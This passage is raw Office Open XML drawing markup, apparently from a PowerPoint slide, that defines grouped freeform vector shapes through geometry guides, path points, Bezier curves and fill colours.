                  <a:ext cx="45" cy="321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32" name="Freeform 834">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C90EB9E9-8541-42AE-89BB-8E1DA020ACA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29" y="2866"/>
                  <a:ext cx="45" cy="321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33" name="Freeform 835">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{441E2416-D7E5-414B-B078-B53E13E05F5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2866"/>
                  <a:ext cx="49" cy="321"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 13"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 84 h 87"/>
                    <a:gd name="T4" fmla="*/ 0 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 4 h 87"/>
                    <a:gd name="T8" fmla="*/ 13 w 13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87">
                      <a:moveTo>
                        <a:pt x="13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3" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13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34" name="Freeform 836">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91AEBF85-F17E-4C5C-85EC-633EFE71C3C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77" y="2705"/>
                  <a:ext cx="45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3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35" name="Freeform 837">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D20C95F8-FEC8-48E3-AF9C-01BB6BA6CF4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77" y="2717"/>
                  <a:ext cx="45" cy="322"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 12 w 12"/>
                    <a:gd name="T3" fmla="*/ 84 h 87"/>
                    <a:gd name="T4" fmla="*/ 12 w 12"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 0 w 12"/>
                    <a:gd name="T7" fmla="*/ 4 h 87"/>
                    <a:gd name="T8" fmla="*/ 0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36" name="Freeform 838">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3735ED66-D3C3-4C7A-8525-BEFF9C807EE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35" y="2717"/>
                  <a:ext cx="42" cy="322"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 12"/>
                    <a:gd name="T1" fmla="*/ 87 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 12"/>
                    <a:gd name="T3" fmla="*/ 84 h 87"/>
                    <a:gd name="T4" fmla="*/ 0 w 12"/>
                    <a:gd name="T5" fmla="*/ 0 h 87"/>
                    <a:gd name="T6" fmla="*/ 12 w 12"/>
                    <a:gd name="T7" fmla="*/ 4 h 87"/>
                    <a:gd name="T8" fmla="*/ 12 w 12"/>
                    <a:gd name="T9" fmla="*/ 8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Freeform 839">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D70F60-D46E-4775-87B4-DD168FDF889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977" y="2787"/>
                  <a:ext cx="597" cy="206"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 161 w 161"/>
                    <a:gd name="T1" fmla="*/ 43 h 56"/>
                    <a:gd name="T2" fmla="*/ 161 w 161"/>
                    <a:gd name="T3" fmla="*/ 56 h 56"/>
                    <a:gd name="T4" fmla="*/ 0 w 161"/>
                    <a:gd name="T5" fmla="*/ 12 h 56"/>
                    <a:gd name="T6" fmla="*/ 0 w 161"/>
                    <a:gd name="T7" fmla="*/ 0 h 56"/>
                    <a:gd name="T8" fmla="*/ 161 w 161"/>
                    <a:gd name="T9" fmla="*/ 43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1" h="56">
                      <a:moveTo>
                        <a:pt x="161" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="56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61" y="43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Freeform 840">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B7990E-BA49-477A-9781-F3DA1ADD596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74" y="2866"/>
                  <a:ext cx="300" cy="127"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 81 w 81"/>
                    <a:gd name="T1" fmla="*/ 0 h 35"/>
                    <a:gd name="T2" fmla="*/ 81 w 81"/>
                    <a:gd name="T3" fmla="*/ 13 h 35"/>
                    <a:gd name="T4" fmla="*/ 0 w 81"/>
                    <a:gd name="T5" fmla="*/ 35 h 35"/>
                    <a:gd name="T6" fmla="*/ 0 w 81"/>
                    <a:gd name="T7" fmla="*/ 22 h 35"/>
                    <a:gd name="T8" fmla="*/ 81 w 8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35">
                      <a:moveTo>
                        <a:pt x="81" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="81" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22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39" name="Freeform 841">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{579AE1A6-DBDC-4026-A806-B0619E2E39B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977" y="2705"/>
                  <a:ext cx="897" cy="240"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 242 w 242"/>
                    <a:gd name="T1" fmla="*/ 43 h 65"/>
                    <a:gd name="T2" fmla="*/ 161 w 242"/>
                    <a:gd name="T3" fmla="*/ 22 h 65"/>
                    <a:gd name="T4" fmla="*/ 161 w 242"/>
                    <a:gd name="T5" fmla="*/ 22 h 65"/>
                    <a:gd name="T6" fmla="*/ 81 w 242"/>
                    <a:gd name="T7" fmla="*/ 0 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 242"/>
                    <a:gd name="T9" fmla="*/ 22 h 65"/>
                    <a:gd name="T10" fmla="*/ 81 w 242"/>
                    <a:gd name="T11" fmla="*/ 44 h 65"/>
                    <a:gd name="T12" fmla="*/ 81 w 242"/>
                    <a:gd name="T13" fmla="*/ 44 h 65"/>
                    <a:gd name="T14" fmla="*/ 161 w 242"/>
                    <a:gd name="T15" fmla="*/ 65 h 65"/>
                    <a:gd name="T16" fmla="*/ 242 w 242"/>
                    <a:gd name="T17" fmla="*/ 43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2" h="65">
                      <a:moveTo>
                        <a:pt x="242" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="43"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="8E4700"/>
                </a:solidFill>
                <a:ln w="6350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13" name="Group 842">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D5CDCAB-9B4F-4781-8490-8FFB9DC561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16" y="1833"/>
                <a:ext cx="90" cy="70"/>
                <a:chOff x="2155" y="1811"/>
                <a:chExt cx="675" cy="523"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="720" name="Freeform 843">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B69F54-AC27-498B-9A80-1398923F15D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90" y="1818"/>
                  <a:ext cx="314" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4460"/>
                    <a:gd name="T1" fmla="*/ 0 h 6160"/>
                    <a:gd name="T2" fmla="*/ 0 w 4460"/>
                    <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                    <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                    <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                    <a:gd name="T8" fmla="*/ 0 w 4460"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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60" h="6160">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="6160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="11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1" name="Freeform 844">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9405E91F-82C1-4804-BC65-7D22285237E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3" y="1850"/>
                  <a:ext cx="268" cy="332"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3803"/>
                    <a:gd name="T1" fmla="*/ 0 h 4725"/>
                    <a:gd name="T2" fmla="*/ 0 w 3803"/>
                    <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                    <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                    <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                    <a:gd name="T8" fmla="*/ 0 w 3803"/>
                    <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3711"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="4725"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="10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2" name="Freeform 845">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{952D193E-33D0-4BB4-890E-2935951B1BC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90" y="1811"/>
                  <a:ext cx="340" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                    <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                    <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                    <a:gd name="T4" fmla="*/ 0 w 4831"/>
                    <a:gd name="T5" fmla="*/ 100 h 1288"/>
                    <a:gd name="T6" fmla="*/ 368 w 4831"/>
                    <a:gd name="T7" fmla="*/ 0 h 1288"/>
                    <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                      <a:moveTo>
                        <a:pt x="4831" y="1189"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4460" y="1288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4831" y="1189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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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3" name="Freeform 846">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327A51F3-6970-44C1-8B36-94BD263B0B4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155" y="2127"/>
                  <a:ext cx="675" cy="181"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9603"/>
                    <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T3" fmla="*/ 0 h 2577"/>
                    <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                    <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                    <a:gd name="T8" fmla="*/ 0 w 9603"/>
                    <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                      <a:moveTo>
                        <a:pt x="0" y="1287"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4802" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9603" y="1287"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="2577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1287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969696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4" name="Freeform 847">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B01078-30A7-4C87-AC89-4C679E8E971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93" y="2218"/>
                  <a:ext cx="337" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4801"/>
                    <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4801"/>
                    <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T5" fmla="*/ 369 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T7" fmla="*/ 0 h 1656"/>
                    <a:gd name="T8" fmla="*/ 0 w 4801"/>
                    <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                      <a:moveTo>
                        <a:pt x="0" y="1290"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1656"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="129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5" name="Freeform 848">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B80B597-110C-4C07-9A01-525FF887C1E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155" y="2218"/>
                  <a:ext cx="338" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4802"/>
                    <a:gd name="T3" fmla="*/ 369 h 1656"/>
                    <a:gd name="T4" fmla="*/ 0 w 4802"/>
                    <a:gd name="T5" fmla="*/ 0 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                      <a:moveTo>
                        <a:pt x="4802" y="1656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="165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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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6" name="Freeform 849">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C5A6C1F-4D46-4A41-BD93-3C61CAE3FF8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51" y="2157"/>
                  <a:ext cx="457" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 6492"/>
                    <a:gd name="T1" fmla="*/ 654 h 1743"/>
                    <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                    <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                    <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                    <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                    <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                    <a:gd name="T7" fmla="*/ 0 h 1743"/>
                    <a:gd name="T8" fmla="*/ 0 w 6492"/>
                    <a:gd name="T9" fmla="*/ 654 h 1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92" h="1743">
                      <a:moveTo>
                        <a:pt x="0" y="654"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4061" y="1743"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6492" y="1091"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2431" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="654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27" name="Freeform 850">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30794580-1AEF-47B4-BFC0-547E42190DC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04" y="1894"/>
                  <a:ext cx="26" cy="357"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 371"/>
                    <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                    <a:gd name="T2" fmla="*/ 371 w 371"/>
                    <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                    <a:gd name="T4" fmla="*/ 371 w 371"/>
                    <a:gd name="T5" fmla="*/ 0 h 5071"/>
                    <a:gd name="T6" fmla="*/ 0 w 371"/>
                    <a:gd name="T7" fmla="*/ 99 h 5071"/>
                    <a:gd name="T8" fmla="*/ 0 w 371"/>
                    <a:gd name="T9" fmla="*/ 5071 h 50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1" h="5071">
                      <a:moveTo>
                        <a:pt x="0" y="5071"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="371" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5071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 cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="C0C0C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14" name="Group 851">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2382CCF1-EBAE-4FC9-AFDD-7DA34B293E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60" y="1819"/>
                <a:ext cx="110" cy="171"/>
                <a:chOff x="2158" y="1204"/>
                <a:chExt cx="419" cy="647"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="715" name="Freeform 852">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39F15165-FF76-4EE3-9F1A-8DE1F5CF994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94" y="1592"/>
                  <a:ext cx="177" cy="231"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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72549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6" name="Freeform 853">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB976E57-68AA-4E3A-8DD6-2219519D207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25" y="1575"/>
                  <a:ext cx="326" cy="276"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
